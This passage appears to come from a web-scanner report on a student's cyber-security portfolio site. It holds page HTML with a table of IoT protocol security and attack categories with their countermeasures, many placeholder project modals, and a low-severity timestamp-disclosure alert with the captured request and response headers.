          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
          <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
           <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
          <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
           </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
           <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          67108864
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        23. GET https://beekmans.dev/
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          908189033, which evaluates to: 1998-10-12 12:43:53

          Request
          Request line and header section (224 bytes)
          GET https://beekmans.dev/ HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1039 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:13 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O9CfHQgObVNEaGCeR54qKKwytECMmlM5H0bXWDqJpVGo4vNUT18M2ld9NoeIDxTsPe1bzHv%2F9eh3xB7p6KNQNXYdikH5v2vQoVZ4Lqr2%2BgmRM8bXQ1W95L9VnzmijHE%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a326098f0c09-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178339 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
